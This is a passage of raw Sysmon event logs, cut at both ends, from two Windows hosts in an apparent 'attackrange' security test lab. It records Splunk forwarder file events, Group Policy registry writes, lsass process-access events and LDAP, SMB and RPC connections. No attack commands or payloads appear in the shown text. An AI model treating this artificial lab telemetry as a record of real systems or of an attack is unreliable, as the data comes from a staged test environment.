Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B58164F88E82988DA6309C983CBE5B69,SHA256=2BD83F8320FC8A5B1FF24CDB2589E1A65328B9F2AA611979ACAA20EBF754CE51,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344425Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:19.389{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057344424Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:19.389{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=91ABF6CC3D7D369431780EE1B18FD69A,SHA256=F3C9709A35E54663FF97C90F7B026E5DB7562A92895A0C589A95554685D19851falsetrue 11241100x800000000000000057344423Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:19.389{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057344422Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:19.389{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AA78EA8018F8731756D1BDB1BDFF147F,SHA256=8782FEA90218454CC006C5828E991D580FE14F1417EDD34DFA80669FC10621ECfalsetrue 354300x800000000000000057344432Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:51.494{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54509-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x800000000000000057344431Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:20.603{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344430Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:20.603{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=956CE488555B9D431A7FFEFB8A97CAE4,SHA256=C10EF0FAA92C197BD9E04E9CDA479D1CE84B800F0C8CD424FB56614963E90C9Afalsetrue 354300x800000000000000021219305Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:07.546{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64301-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219304Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:20.470{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18EC772EA9AAF39D7F4E777EC07E9190,SHA256=734CC3DE954211B2919873A663D1DB94F088B4C10E81273FAAC6E794BA37F26D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219303Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:20.205{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=07D9C24CB56B17336116C84A2696FEE7,SHA256=356EBA85E1E3AB29420B816EAEFDEF8F2AA93691868B18F7A8515E9A90880FD6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219302Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:20.205{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A3ACBBCC3163EE28383DEF229E6DCB41,SHA256=E177C3B5C2B424E512D41554FF9BD633827869BFC51A9C5307760094676ADE33,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219306Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:21.470{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C89FD1ADBE82834D88084FAFFF53EBE,SHA256=86ED0162AE101060AFAAE496B5AF8286A0F7A9B0403FDEB74FD88B8A27E10A9F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000057344471Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:15:21.172{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History\PolicyOverdueDWORD (0x00000000) 12241200x800000000000000057344470Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:15:21.172{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History 13241300x800000000000000057344469Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:15:21.172{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Extension-List\{00000000-0000-0000-0000-000000000000}\LoggingStatusDWORD (0x00000000) 13241300x800000000000000057344468Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:15:21.172{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Extension-List\{00000000-0000-0000-0000-000000000000}\StatusDWORD (0x00000000) 13241300x800000000000000057344467Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:15:21.172{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Extension-List\{00000000-0000-0000-0000-000000000000}\EndTimeHiDWORD (0x01d7d7be) 13241300x800000000000000057344466Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:15:21.172{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Extension-List\{00000000-0000-0000-0000-000000000000}\EndTimeLoDWORD (0xf69952f1) 13241300x800000000000000057344465Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:15:21.172{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Extension-List\{00000000-0000-0000-0000-000000000000}\StartTimeHiDWORD (0x01d7d7be) 13241300x800000000000000057344464Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:15:21.172{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Extension-List\{00000000-0000-0000-0000-000000000000}\StartTimeLoDWORD (0xf687b1db) 12241200x800000000000000057344463Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:15:21.172{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Extension-List\{00000000-0000-0000-0000-000000000000} 12241200x800000000000000057344462Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:15:21.172{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Extension-List 12241200x800000000000000057344461Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:15:21.172{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine 13241300x800000000000000057344460Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:15:21.172{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\LastExtensionMadeSyncRequest{00000000-0000-0000-0000-000000000000} 13241300x800000000000000057344459Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:15:21.172{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\NextRefreshReasonDWORD (0x00000007) 13241300x800000000000000057344458Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:15:21.172{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\NextRefreshModeDWORD (0x00000001) 12241200x800000000000000057344457Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:15:21.172{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\ServiceInstances 13241300x800000000000000057344456Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:15:21.172{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\DataStore\Machine\0\szTargetNameWIN-DC-469 12241200x800000000000000057344455Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:15:21.172{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\DataStore\Machine\0 12241200x800000000000000057344454Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:15:21.172{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\DataStore\Machine 12241200x800000000000000057344453Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:15:21.172{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\DataStore\Machine 13241300x800000000000000057344452Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:15:21.172{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\DataStore\Machine\0\szNameATTACKRANGE\WIN-DC-469$ 12241200x800000000000000057344451Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:15:21.172{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\DataStore\Machine\0 12241200x800000000000000057344450Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:15:21.172{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\DataStore\Machine 12241200x800000000000000057344449Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:15:21.172{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\DataStore\Machine 10341000x800000000000000057344448Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:21.172{8B6011A9-886B-6164-0B00-00000000F101}6489376C:\Windows\system32\lsass.exe{8B6011A9-884A-6164-0100-00000000F101}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+2b3d4|C:\Windows\system32\lsasrv.dll+30929|C:\Windows\system32\lsasrv.dll+2e287|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+15ded|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 12241200x800000000000000057344447Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:15:21.172{8B6011A9-886B-6164-0B00-00000000F101}648C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 13241300x800000000000000057344446Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:15:21.172{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History\IsSlowLinkDWORD (0x00000000) 12241200x800000000000000057344445Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:15:21.172{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History 12241200x800000000000000057344444Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:15:21.056{8B6011A9-886B-6164-0B00-00000000F101}648C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 18141800x800000000000000057344443Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:15:21.056{8B6011A9-886E-6164-1600-00000000F101}1316\lsassC:\Windows\System32\svchost.exe 12241200x800000000000000057344442Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:15:21.056{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000057344441Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:15:21.056{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 13241300x800000000000000057344440Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:15:21.056{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History\NetworkNameus-west-2.compute.internal 13241300x800000000000000057344439Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:15:21.056{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History\DCName\\win-dc-469.attackrange.local 12241200x800000000000000057344438Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:15:21.056{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History 12241200x800000000000000057344437Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:15:21.056{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKU\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\Network\Location Awareness 12241200x800000000000000057344436Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:15:21.056{8B6011A9-886B-6164-0B00-00000000F101}648C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000057344435Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:15:21.056{8B6011A9-886B-6164-0B00-00000000F101}648C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000057344434Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:15:21.056{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Cache 12241200x800000000000000057344433Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:15:21.056{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy 10341000x800000000000000021219310Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:22.595{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5433-6143-1600-00000000F101}1196C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219309Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:22.595{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5433-6143-1600-00000000F101}1196C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219308Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:22.595{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5433-6143-1600-00000000F101}1196C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000021219307Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:22.580{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F896E83E432FFFC0D8376889E1B66663,SHA256=69674D17D793E5D8861CC61FD351BA6D83C4B3E834B72707D6A1F4E6DB62B626,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000057344485Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:53.527{8B6011A9-884A-6164-0100-00000000F101}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:2117:fdb0:db44:3240win-dc-469.attackrange.local54514-truefe80:0:0:0:2117:fdb0:db44:3240win-dc-469.attackrange.local445microsoft-ds 354300x800000000000000057344484Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:53.527{8B6011A9-884A-6164-0100-00000000F101}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:2117:fdb0:db44:3240win-dc-469.attackrange.local54514-truefe80:0:0:0:2117:fdb0:db44:3240win-dc-469.attackrange.local445microsoft-ds 354300x800000000000000057344483Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:53.418{8B6011A9-886B-6164-0B00-00000000F101}648C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-469.attackrange.local54513-false10.0.1.14win-dc-469.attackrange.local389ldap 354300x800000000000000057344482Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:53.418{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54513-false10.0.1.14win-dc-469.attackrange.local389ldap 354300x800000000000000057344481Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:53.411{8B6011A9-886B-6164-0B00-00000000F101}648C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:2117:fdb0:db44:3240win-dc-469.attackrange.local54512-truefe80:0:0:0:2117:fdb0:db44:3240win-dc-469.attackrange.local389ldap 354300x800000000000000057344480Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:53.410{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:2117:fdb0:db44:3240win-dc-469.attackrange.local54512-truefe80:0:0:0:2117:fdb0:db44:3240win-dc-469.attackrange.local389ldap 354300x800000000000000057344479Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:53.410{8B6011A9-886B-6164-0B00-00000000F101}648C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:2117:fdb0:db44:3240win-dc-469.attackrange.local54511-truefe80:0:0:0:2117:fdb0:db44:3240win-dc-469.attackrange.local49666- 354300x800000000000000057344478Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:53.410{8B6011A9-886B-6164-0B00-00000000F101}648C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:2117:fdb0:db44:3240win-dc-469.attackrange.local54511-truefe80:0:0:0:2117:fdb0:db44:3240win-dc-469.attackrange.local49666- 354300x800000000000000057344477Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:53.409{8B6011A9-886D-6164-0D00-00000000F101}904C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:2117:fdb0:db44:3240win-dc-469.attackrange.local54510-truefe80:0:0:0:2117:fdb0:db44:3240win-dc-469.attackrange.local135epmap 354300x800000000000000057344476Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:53.409{8B6011A9-886B-6164-0B00-00000000F101}648C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:2117:fdb0:db44:3240win-dc-469.attackrange.local54510-truefe80:0:0:0:2117:fdb0:db44:3240win-dc-469.attackrange.local135epmap 11241100x800000000000000057344475Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:22.088{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057344474Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:22.088{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=91ABF6CC3D7D369431780EE1B18FD69A,SHA256=F3C9709A35E54663FF97C90F7B026E5DB7562A92895A0C589A95554685D19851falsetrue 11241100x800000000000000057344473Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:22.021{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344472Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:22.020{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 